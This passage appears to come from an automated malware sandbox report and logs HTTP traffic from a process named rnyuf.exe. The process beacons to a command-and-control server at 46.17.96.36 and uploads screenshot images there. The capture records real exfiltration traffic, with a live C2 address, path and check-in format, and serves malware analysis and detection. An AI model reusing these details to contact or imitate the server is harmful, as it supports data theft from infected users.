                                        Aug 29, 2021 22:27:17.058537006 CEST3130OUTData Raw: 4b 96 37 fe b7 7f e4 64 d4 af 14 b1 47 14 92 45 22 47 32 96 8d 99 48 0e 01 20 90 7b 8c 82 38 ee 2a 2a e9 f5 1d 2f 56 b9 f0 9f 86 2f ed 34 fb a9 6d 6d ed 26 f3 2e 12 06 68 a3 22 e6 43 f3 36 36 8e dd 4d 6d 39 f2 b5 e6 ed f9 99 46 1c c9 99 bf d8 1a
                                        Data Ascii: K7dGE"G2H {8**/V/4mm&.h"C66Mm9F3>e-le|(1q+2yK22! `F@'W}a}ZLCQnt$,e#,0OA-Qn-G?l.Kn,>U cb_2_c
                                        Aug 29, 2021 22:27:17.168260098 CEST3175INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:17 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        190192.168.2.44992946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:06.790169954 CEST13366OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:06.870184898 CEST13367INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:06 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        191192.168.2.44993046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:07.086066008 CEST13367OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:07.086180925 CEST13368OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:07.086383104 CEST13378OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:07.086496115 CEST13380OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:07.123935938 CEST13386OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:07.124003887 CEST13396OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:28:07.124031067 CEST13406OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:28:07.159794092 CEST13409OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:07.159820080 CEST13411OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:28:07.159846067 CEST13417OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:28:07.159871101 CEST13419OUTData Raw: 1c a2 16 0a 36 95 e0 48 07 5a bf 79 7f a3 c5 e3 ab fd 76 2d 6e d2 e2 d6 f0 de 6d 48 a1 9c 48 9e 64 12 2a ee 0d 18 1c b3 01 c1 3d 7d 39 a7 ed ea 59 bb 7f 37 e1 b0 4a 85 3b d9 3e a6 24 1a 3c af 15 ec b7 57 16 f6 29 63 70 96 d7 26 e3 7f ee dd b7 e3
                                        Data Ascii: 6HZyv-nmHHd*=}9Y7J;>$<W)cp&V$,Wn|/,76yqs*d$v5U]r;eex+\kl)BD]:'h<7 I\KYhqOU2}.KqcMp4M*R6v6
                                        Aug 29, 2021 22:28:07.268055916 CEST13476INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:07 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        192192.168.2.44993146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:07.138973951 CEST13406OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:07.212142944 CEST13475INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:07 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        193192.168.2.44993246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:07.363717079 CEST13477OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:07.433898926 CEST13477INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:07 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        194192.168.2.44993346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:07.572616100 CEST13478OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:07.572700977 CEST13478OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:07.572865963 CEST13488OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:07.572997093 CEST13490OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:07.606334925 CEST13493OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:07.606398106 CEST13499OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:07.606417894 CEST13504OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:07.607032061 CEST13507OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:28:07.607067108 CEST13511OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:28:07.607336998 CEST13516OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:07.639525890 CEST13519OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:07.744636059 CEST13586INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:07 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 0
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        195192.168.2.44993446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:07.653723001 CEST13567OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:07.750045061 CEST13587INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:07 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        196192.168.2.44993546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:08.131700039 CEST13587OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:08.206363916 CEST13588INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:08 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        197192.168.2.44993646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:08.215981960 CEST13588OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:08.216072083 CEST13588OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:08.216259003 CEST13599OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:08.216417074 CEST13601OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:08.248502016 CEST13609OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:08.248565912 CEST13620OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:08.248753071 CEST13621OUTData Raw: 1f c3 56 c5 cb 8f 7a 91 6e bd 68 f6 70 7d 43 da 54 46 69 86 41 fc 26 9a 55 87 50 45 6b 7d a5 0f 55 14 be 64 2d d5 45 3f 63 17 b3 0f 6c fa a3 23 14 95 ae 52 dd bb 51 f6 4b 73 d3 8a 9f 62 fa 31 fb 75 d5 19 34 56 a9 d3 e3 3d 1a a3 3a 61 ec c2 97 b1
                                        Data Ascii: Vznhp}CTFiA&UPEk}Ud-E?cl#RQKsb1u4V=:a{hx4e0KIt)TUijco"2;\KFKJp1J2n%-4!ih%8RSP(.($Zp*Si,ZQIJ*--%8SD;H.(&LShG.(>P!FmsG(s
                                        Aug 29, 2021 22:28:08.248868942 CEST13627OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:08.281949997 CEST13630OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:08.282012939 CEST13643OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
